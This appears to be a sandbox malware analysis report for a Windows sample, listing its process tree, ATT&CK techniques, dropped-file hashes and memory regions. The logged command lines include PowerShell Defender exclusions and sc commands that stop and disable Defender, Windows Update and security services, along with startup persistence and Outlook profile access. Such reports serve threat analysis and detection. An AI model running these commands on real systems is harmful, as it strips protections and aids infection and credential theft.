- C:\Users\Admin\AppData\Local\Temp\812e0579-016b-473d-a1d4-764076972c4c\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\812e0579-016b-473d-a1d4-764076972c4c\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\812e0579-016b-473d-a1d4-764076972c4c\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3932
- - C:\Users\Admin\AppData\Local\Temp\812e0579-016b-473d-a1d4-764076972c4c\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\812e0579-016b-473d-a1d4-764076972c4c\AdvancedRun.exe" /SpecialRun 4101d8 3932
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3012
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1264
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4112
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe"
  2⤵
  - UAC bypass
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Maps connected drives based on registry
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2564
- - C:\Users\Admin\AppData\Local\Temp\8ff7f177-10f9-47d8-9a87-7d12d670c76e\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\8ff7f177-10f9-47d8-9a87-7d12d670c76e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8ff7f177-10f9-47d8-9a87-7d12d670c76e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    - Access Token Manipulation: Create Process with Token
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8ff7f177-10f9-47d8-9a87-7d12d670c76e\test.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\system32\sc.exe
        
        sc stop windefend
        5⤵
        Launches sc.exe
        
        PID:1524
    - - C:\Windows\system32\sc.exe
        
        sc config windefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:3452
    - - C:\Windows\system32\sc.exe
        
        sc stop Sense
        5⤵
        Launches sc.exe
        
        PID:5072
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start= disabled
        5⤵
        Launches sc.exe
        
        PID:4212
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2436
    - - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        5⤵
        Launches sc.exe
        
        PID:3096
    - - C:\Windows\system32\sc.exe
        
        sc stop usosvc
        5⤵
        Launches sc.exe
        
        PID:2968
    - - C:\Windows\system32\sc.exe
        
        sc config usosvc start= disabled
        5⤵
        Launches sc.exe
        
        PID:4720
    - - C:\Windows\system32\sc.exe
        
        sc stop WaasMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1256
    - - C:\Windows\system32\sc.exe
        
        sc config WaasMedicSvc start= disabled
        5⤵
        Launches sc.exe
        
        PID:4128
    - - C:\Windows\system32\sc.exe
        
        sc stop SecurityHealthService
        5⤵
        Launches sc.exe
        
        PID:4512
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start= disabled
        5⤵
        Launches sc.exe
        
        PID:4244
    - - C:\Windows\system32\sc.exe
        
        sc stop SDRSVC
        5⤵
        Launches sc.exe
        
        PID:4080
    - - C:\Windows\system32\sc.exe
        
        sc config SDRSVC start= disabled
        5⤵
        Launches sc.exe
        
        PID:4004
    - - C:\Windows\system32\sc.exe
        
        sc stop wscsvc
        5⤵
        Launches sc.exe
        
        PID:2880
    - - C:\Windows\system32\sc.exe
        
        sc config wscsvc start= disabled
        5⤵
        Launches sc.exe
        
        PID:2340
    - - C:\Windows\system32\sc.exe
        
        sc stop WdiServiceHost
        5⤵
        Launches sc.exe
        
        PID:2684
    - - C:\Windows\system32\sc.exe
        
        sc config WdiServiceHost start= disabled
        5⤵
        Launches sc.exe
        
        PID:3972
    - - C:\Windows\system32\sc.exe
        
        sc stop WdiSystemHost
        5⤵
        Launches sc.exe
        
        PID:4940
    - - C:\Windows\system32\sc.exe
        
        sc config WdiSystemHost start= disabled
        5⤵
        Launches sc.exe
        
        PID:2644
    - - C:\Windows\system32\sc.exe
        
        sc stop InstallService
        5⤵
        Launches sc.exe
        
        PID:4616
    - - C:\Windows\system32\sc.exe
        
        sc config InstallService Start= disabled
        5⤵
        Launches sc.exe
        
        PID:5092
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\7957F23F\svchost.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:536
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2436
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\7957F23F\svchost.exe" -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1256
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe"
    3⤵
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:3504
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\7957F23F\svchost.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4596
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\7957F23F\svchost.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:628
- C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe
  "C:\Users\Admin\AppData\Local\Temp\e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2564 -ip 2564
1⤵
PID:772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 1996
1⤵
- Program crash
PID:1612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c17c1dcd792690220132a7e645ea3160

SHA1
937cb3d7d8a233c6ef1ff2dff7b414dde5f86c79

SHA256
e77929fb03e95d29272d766f14dc072543f4eb45cb286928059e84d32d6c21bd

SHA512
9a2ee3a6bb33e950f07dfd9176e36466cc6e8f6c27082403870acb28d9edbfff9374422364038cfb69fb82ce122510534fa61009f5b679b3c34053a79f247f75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
90da6962f8b8e5985731f007a9ad4a5c

SHA1
17d3f079776d21b386840110e5d2f1a8b5a0752b

SHA256
a227948a6d084463af7ee0efeefb6fa447b9481def3722f9ad6b12f45f8022c9

SHA512
4491bd247d1ef92643256daeff0c689a7e7e73c8834281aeddfcd5939163a35e4de8e949b3f0faa3487e8773efc4e878a189032c32ecddb1288b37c866fc3239

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
67bdca8de8d06610022f99a05d3fc38f

SHA1
c50db16454577c9a20a156560ac3d732179515d7

SHA256
3feb3b2e3823f57a62966343f931f59a6a689a1d9d8d27ef975e60a71eaf7afa

SHA512
05596b7cd7b94c9abd9af68f212d267a79393ce01c53c48930de62f30001a6e8fd303423c789a82d8291f79d6d685a9d60f7e021687ad5d6e86d9a6b8fd4ac50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
177d265347352e90dbb2536a44f96d71

SHA1
4897b64ea0770df3035997cf84a62454b4c0c821

SHA256
2d0e6be1a4fadbb1b12a6a8cd163958dd914c5fec73fca2795f1237c343b5e77

SHA512
a3c7bf9c291aa0a28b69367ac4767fadf80e4618d0581ed257f83f50cefd8461f267cf3e8697c1a62204f02471b272ee7d4d6f38e54d02186cd684e62395a8ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
414cf94357e6909a6202af83c4b1c205

SHA1
4db7b37b88373cb620521fadc96c8b38ddb87b9b

SHA256
63103afb6f71af2337f1897545ecb6bc69e7ac61b10b2b99abfd280fa35a0b64

SHA512
87023fc5ce0551e7cdcf6e19830debcc62a09d1f7df3f18e6030c6736b570bf892ce08ef10d1416a25b968b2d241f141ff494fcc320344d8d457423f79ea9406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4b5fd34e12a752698ec8164126ae1b93

SHA1
d970953d42de473113b0a76567e7cd9ca1d41c2b

SHA256
df29ab22665faf142b6d451442f3b08e868d1a40117584c784e14066e207b747

SHA512
57215b8734984bab581024648646a3c7a260f62cfc5856c8360e44426af9fa9e434dfb236d215758d095cb1abe9324b6d9615f06cfce89151768a466f1797ca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
39bf809edbcb865c529e320a5b178c58

SHA1
ebc5ce8ce7afc822d42105fe5bdbe0737eb21749

SHA256
0883e30a22adcf44430dcd8ace5281b1bd6e3265e4760b2327fef715f0a0a873

SHA512
d77088839cae94eca0e8820396c9b45d1faeff1606cf476f7cbc87f9b7a30ff1f23557bd90730d498d277bf8244684730abd97b6f150863601f27f00f80ab87f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
68ad7a955e91437ca5e7313ffbfca076

SHA1
8e8b8ed2bcdbb403e13c636728aedba6b2bcc91f

SHA256
49c6aa26c6f3df0d632a645bc828b2f318f229562e775da141aa136c652ad093

SHA512
1fd4f6ae1943cf9caa748258b0bd86ee104db9a6f33d23ddbaa8b600d8234e4734656e53decea25c72128ad98c752ea2f82558ba11c768291feaa1ef2bd131dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cb43935ac4939b5a0b6898fc0f16ec89

SHA1
cb881093d67f5b879caa589c9907cf47d820bdc6

SHA256
5969189332e672fe15b9c5ce01534165d97dc3c948d8c0d0305e742cc5f3f882

SHA512
72753993b779c9a475013a8504bc086b95d9bd5e865ba978c18acc63bcf42d758884a5f85d06014fb2d82166820b974e82780915615327156773b9836787cf56

Download Submit
C:\Users\Admin\AppData\Local\Temp\812e0579-016b-473d-a1d4-764076972c4c\AdvancedRun.exe

Filesize
88KB

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\8ff7f177-10f9-47d8-9a87-7d12d670c76e\test.bat

Filesize
8KB

MD5
b2a5ef7d334bdf866113c6f4f9036aae

SHA1
f9027f2827b35840487efd04e818121b5a8541e0

SHA256
27426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e

SHA512
8ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ktjsjc4p.wro.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7B71FC14.exe

Filesize
1.7MB

MD5
9091d550f7b9f77815e4ff83881a7447

SHA1
5ad66e47924d2d4d9cc136bbbfac15474ed3ece9

SHA256
e8cb59eb6467e18f07012693880614e85867d1bf19449d64da75de80338654a5

SHA512
3b02d962560158da631ea6dfff34951bf82db42138bac406412d483f3042ba161a203688874b051ee520bd425b6e9be0e053c00ec260b887241d1606da7671c1

Download Submit
memory/536-306-0x00000000716B0000-0x00000000716FC000-memory.dmp

Filesize
304KB

Download
memory/628-222-0x0000000007C90000-0x0000000007C98000-memory.dmp

Filesize
32KB

Download
memory/628-221-0x0000000007CB0000-0x0000000007CCA000-memory.dmp

Filesize
104KB

Download
memory/628-206-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/628-220-0x0000000007BB0000-0x0000000007BC4000-memory.dmp

Filesize
80KB

Download
memory/1264-152-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/1264-217-0x0000000007410000-0x00000000074A6000-memory.dmp

Filesize
600KB

Download
memory/1264-219-0x00000000073C0000-0x00000000073CE000-memory.dmp

Filesize
56KB

Download
memory/1816-256-0x0000000005760000-0x0000000005AB4000-memory.dmp

Filesize
3.3MB

Download
memory/1816-295-0x00000000716B0000-0x00000000716FC000-memory.dmp

Filesize
304KB

Download
memory/1816-305-0x0000000006F20000-0x0000000006FC3000-memory.dmp

Filesize
652KB

Download
memory/1816-294-0x0000000005E60000-0x0000000005EAC000-memory.dmp

Filesize
304KB

Download
memory/1816-346-0x0000000007260000-0x0000000007271000-memory.dmp

Filesize
68KB

Download
memory/1948-326-0x00000000716B0000-0x00000000716FC000-memory.dmp

Filesize
304KB

Download
memory/1952-336-0x00000000716B0000-0x00000000716FC000-memory.dmp

Filesize
304KB

Download
memory/2340-39-0x0000000006800000-0x0000000006808000-memory.dmp

Filesize
32KB

Download
memory/2340-5-0x0000000005070000-0x000000000507A000-memory.dmp

Filesize
40KB

Download
memory/2340-1-0x0000000000440000-0x00000000005F0000-memory.dmp

Filesize
1.7MB

Download
memory/2340-2-0x0000000004F50000-0x0000000004FEC000-memory.dmp

Filesize
624KB

Download
memory/2340-3-0x00000000055B0000-0x0000000005B54000-memory.dmp

Filesize
5.6MB

Download
memory/2340-0-0x0000000074EFE000-0x0000000074EFF000-memory.dmp

Filesize
4KB

Download
memory/2340-4-0x00000000050A0000-0x0000000005132000-memory.dmp

Filesize
584KB

Download
memory/2340-71-0x0000000074EF0000-0x00000000756A0000-memory.dmp

Filesize
7.7MB

Download
memory/2340-6-0x00000000051A0000-0x00000000051F6000-memory.dmp

Filesize
344KB

Download
memory/2340-9-0x0000000005500000-0x0000000005566000-memory.dmp

Filesize
408KB

Download
memory/2340-7-0x0000000074EF0000-0x00000000756A0000-memory.dmp

Filesize
7.7MB

Download
memory/2340-8-0x0000000005310000-0x000000000537E000-memory.dmp

Filesize
440KB

Download
memory/2436-316-0x00000000716B0000-0x00000000716FC000-memory.dmp

Filesize
304KB

Download
memory/2436-347-0x0000000007F60000-0x0000000007F74000-memory.dmp

Filesize
80KB

Download
memory/2904-162-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/3012-41-0x00000000057A0000-0x00000000057C2000-memory.dmp

Filesize
136KB

Download
memory/3012-121-0x00000000076E0000-0x0000000007712000-memory.dmp

Filesize
200KB

Download
memory/3012-145-0x0000000007740000-0x00000000077E3000-memory.dmp

Filesize
652KB

Download
memory/3012-52-0x0000000006240000-0x0000000006594000-memory.dmp

Filesize
3.3MB

Download
memory/3012-118-0x00000000067E0000-0x000000000682C000-memory.dmp

Filesize
304KB

Download
memory/3012-42-0x0000000005FE0000-0x0000000006046000-memory.dmp

Filesize
408KB

Download
memory/3012-122-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/3012-117-0x0000000006760000-0x000000000677E000-memory.dmp

Filesize
120KB

Download
memory/3012-34-0x0000000005940000-0x0000000005F68000-memory.dmp

Filesize
6.2MB

Download
memory/3012-32-0x0000000005170000-0x00000000051A6000-memory.dmp

Filesize
216KB

Download
memory/3012-139-0x0000000007720000-0x000000000773E000-memory.dmp

Filesize
120KB

Download
memory/3192-38-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/3192-357-0x0000000006680000-0x00000000066D0000-memory.dmp

Filesize
320KB

Download
memory/3192-223-0x0000000005AF0000-0x0000000005B08000-memory.dmp

Filesize
96KB

Download
memory/3396-133-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/3396-216-0x0000000007A40000-0x0000000007A4A000-memory.dmp

Filesize
40KB

Download
memory/3396-175-0x00000000079D0000-0x00000000079EA000-memory.dmp

Filesize
104KB

Download
memory/3396-174-0x0000000008010000-0x000000000868A000-memory.dmp

Filesize
6.5MB

Download
memory/3396-218-0x0000000007BF0000-0x0000000007C01000-memory.dmp

Filesize
68KB

Download
memory/4112-176-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/4548-186-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download
memory/4596-196-0x0000000071440000-0x000000007148C000-memory.dmp

Filesize
304KB

Download